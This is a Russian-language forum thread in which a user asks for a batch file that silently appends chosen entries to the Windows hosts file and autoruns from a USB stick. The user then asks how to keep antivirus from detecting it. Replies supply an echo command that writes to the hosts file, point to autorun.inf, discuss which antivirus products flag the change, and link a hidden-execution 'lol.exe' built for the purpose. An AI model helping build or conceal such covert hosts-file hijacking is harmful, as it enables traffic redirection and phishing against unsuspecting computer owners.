![]() |
bat файл делающий кое какие изменения в системе
Товарищи. Просьба у кого есть время и желание помочь то прошу прочитать и кто умеет сделать. :)
Многие знают, что в Windows 2000/XP есть некие данные, которые хранятся в файле System32\drivers\etc\hosts. А в Windows 9x - в файле hosts Кстати в линуксе тоже есть такой файл. Было бы здорово и его тоже учесть. Цель: добавление в этот файл, посредством запуска bat файла новых строк, либо тупо замена существующего файла, на свой. Как угодно. Суть в том чтобы добавить туда новые данные. Вот надо бы следующее: Написать такой bat файл, чтобы он определял какая винда стоит (это надо чтобы узнать путь файл, где он хранится) и добавлял новые данные (которые мы можем изменять, желательно прямо в бат файле), и чтобы этот bat файл грузился автоматически с флешки, как только ее вставляешь (желательно). В целом можно прописать чтобы он если такой файл есть, то добавлял в него то, что нам надо. Если нет (мы же не знаем какая винда у юзера будет), то ничего бы не делал. Как это сделать я не знаю. Но знаю как можно было бы его применить! Кто поможет? И не надо писать, что это не актуально, что есть перезагрузка на sp2 и так далее. С меня чего нибудь причитается. |
проще написать exe'шник и переименовать в бат
|
echo 127.0.0.1 localhost>> C:\WINDOWS\system32\drivers\etc\hosts
для винды ХР а что бы ОС батник сам узнавал, это имхо прогу уже написать exe а не мучиться с батниками |
хм
ну а если прописать несколько путей. он их просто не будет выполнять или как? чтобы задействовать разного рода системы. может проще exe я же не знаю так то. если проще его напиши его. только после переиенования в бат он будет работать? 2 SVAROG Спасибо) а авторан как сделать, чтобы запускался этот файл с флехи сразу? |
>после переиенования в бат он будет работать?
будет писать лень, создай топик в программирвоании тебе напишут. там 10 строк кода чтобы грузился с флешки, создай в ее корне autorun.inf - дальше в гугль за параметрами |
почти любой антивирь запалит модификацию этого файла
|
Какая разница запалит или нет.
суть не в том. к тому же nod и каспер не палит. хз. сп 2 и 3 перезагрузка не нужна. тему вторую создавать не хочется. но видимо придется. как сделать чтобы не запалить? у кого в каких системах палится и при каких параметрах, антивирусниках??? может существуют какие либо другие способы чтобы антивирь не палил (раз уж на то пошло). какой путь прописать для линукса. где там этот файл лежит? |
не знаю то или нет: http://webfile.ru/2700198
в архиве: lol.exe 1.txt записи из 1.txt дописываются в System32\drivers\etc\hosts (файл hosts не заменяется, а дописывается!) lol.exe (.bat переделан в .exe и полностью скрыто выполение) на авторан дописывай сам... если что то нужно подкорректировать пиши в пм (или если нужна другая иконка) |
у меня каспер палил такие вещи. или это был кис....
кстате а на линукс ты что тоже бат файл собрался делать? |
запусти на виртуалке и проверь
Сделал то что конкретно просили в 1 посте |
| Время: 00:14 |